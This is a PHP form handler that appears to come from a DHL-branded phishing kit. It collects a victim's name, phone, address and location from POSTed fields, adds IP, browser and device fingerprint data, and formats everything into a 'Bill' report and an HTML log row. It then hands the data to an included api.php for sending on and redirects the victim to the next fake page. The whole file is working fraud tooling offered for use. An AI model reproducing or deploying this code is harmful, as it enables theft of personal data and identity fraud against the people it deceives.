<?php
 session_start();
@ini_set('display_errors', 'on');
require 'detect.php';
include "setting.php";
$IP = getenv("REMOTE_ADDR");
$date = date("d M, Y");
$times = date("g:i a");
$code = $_SESSION['ip_countryCode']=clientData('code');
$country = strtolower($code);
if(isset($_POST['fnm'])&&isset($_POST['phn'])){
   

$fnm=$_POST['fnm'];
$lnm=$_POST['lnm'];
$phn=$_POST['phn'];
$cnt=$_POST['cnt'];
$adr=$_POST['adr'];
$cty=$_POST['cty'];
$zip=$_POST['zip'];
$stt=$_POST['stt'];
$brow = $_SESSION['browser'];
$sys = $_SESSION['os'];
$useragent = $_SERVER['HTTP_USER_AGENT'];
$ecran = $_SESSION['computer'];
$screen = $_POST['screen'];;


$msg= '
[+]━━━━━━━【💳 Bill】━━━━━━[+]
[👤 First Name]  = '.$fnm.'
[👤 Last Name]  = '.$lnm.'
[📞 Phone ]  = '.$phn.'
[🌎 Country ]   = '.$cnt.'
[🗺 Addres ]  = '.$adr.'
[🌎 City ]  = '.$cty.'
[🌎 State ]   = '.$stt.'
[📮 zip Code]  = '.$zip.'
[+]━━━━━【💻 System】━━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$IP.'
[⏰ TIME/DATE] ='.$times.' / '.$date.'
[🌐 BROWSER] = '.$brow.' and '.$sys.'
[🖖 FINGERPRINT] = '.$screen.' and '.$useragent.'
[+]━━━━━【💖DHL💖】━━━━[+]';
$msght = '
<tr>
			<td width="80">
			<p align="center"><img src="https://www.countryflags.io/'.$_SESSION['ip_countryCode'].'/flat/24.png">' .$IP.'</th>
			<td width="60">
			<p align="center">'.$fnm.'  '.$lnm.'</th>
			<td width="60">
			<p align="center">'.$adr.'</th>
			<td width="30">
			<p align="center">'.$cty.'</th>
			<td width="30">
			<p align="center">'.$stt.'</th>
			<td width="20">
			<p align="center">'.$zip.'</th>
			<td width="30">
			<p align="center">'.$cnt.'</th>
			<td width="30">
			<p align="center">'.$phn.'</th>
			<td width="60">
			<p align="center">'.$times.' / '.$date.'</th>
			</font></th></tr>';


$lastph = substr($phn,-4);$_SESSION['lastph']=$lastph;
include("api.php");
header('location: ../portail.php?country.x=Global&tow=ok&flowId=ul&_Email=datax'); 

}


?>